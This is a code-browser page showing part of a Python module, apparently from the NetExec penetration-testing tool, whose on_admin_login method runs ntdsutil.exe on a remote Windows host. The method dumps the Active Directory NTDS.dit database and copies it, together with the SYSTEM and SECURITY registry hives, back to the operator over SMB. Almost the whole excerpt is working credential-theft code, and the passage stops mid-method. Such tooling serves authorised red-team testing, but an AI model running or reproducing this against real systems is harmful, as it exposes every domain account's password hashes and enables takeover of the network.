
Method on_admin_login

nxc/modules/ntdsutil.py:42–179  ·  view source on GitHub ↗
(self, context, connection)


40 self.no_delete = True
41
42 def on_admin_login(self, context, connection):
43 command = f"powershell \"ntdsutil.exe 'ac i ntds' 'ifm' 'create full {self.tmp_dir}{self.dump_location}' q q\""
44 context.log.display(f"Dumping ntds with ntdsutil.exe to {self.tmp_dir}{self.dump_location}")
45 context.log.highlight("Dumping the NTDS, this could take a while so go grab a redbull...")
46 context.log.debug(f"Executing command {command}")
47 p = connection.execute(command, True)
48 context.log.debug(p)
49 if "success" in p:
50 context.log.success(f"NTDS.dit dumped to {self.tmp_dir}{self.dump_location}")
51 else:
52 context.log.fail("Error while dumping NTDS")
53 return
54
55 os.makedirs(self.dir_result, exist_ok=True)
56 os.makedirs(os.path.join(self.dir_result, "Active Directory"), exist_ok=True)
57 os.makedirs(os.path.join(self.dir_result, "registry"), exist_ok=True)
58
59 context.log.display(f"Copying NTDS dump to {self.dir_result}")
60
61 context.log.debug("Copy ntds.dit to host")
62 with open(os.path.join(self.dir_result, "Active Directory", "ntds.dit"), "wb+") as dump_file:
63 try:
64 connection.conn.getFile(
65 self.share,
66 f"{self.tmp_share}{self.dump_location}\\Active Directory\\ntds.dit",
67 dump_file.write,
68 )
69 context.log.debug("Copied ntds.dit file")
70 except Exception as e:
71 context.log.fail(f"Error while get ntds.dit file: {e}")
72
73 context.log.debug("Copy SYSTEM to host")
74 with open(os.path.join(self.dir_result, "registry", "SYSTEM"), "wb+") as dump_file:
75 try:
76 connection.conn.getFile(
77 self.share,
78 f"{self.tmp_share}{self.dump_location}\\registry\\SYSTEM",
79 dump_file.write,
80 )
81 context.log.debug("Copied SYSTEM file")
82 except Exception as e:
83 context.log.fail(f"Error while get SYSTEM file: {e}")
84
85 context.log.debug("Copy SECURITY to host")
86 with open(os.path.join(self.dir_result, "registry", "SECURITY"), "wb+") as dump_file:
87 try:
88 connection.conn.getFile(
89 self.share,
90 f"{self.tmp_share}{self.dump_location}\\registry\\SECURITY",
91 dump_file.write,
92 )
93 context.log.debug("Copied SECURITY file")
94 except Exception as e:
95 context.log.fail(f"Error while get SECURITY file: {e}")
96
97 context.log.display(f"NTDS dump copied to {self.dir_result}")
98
99 try:
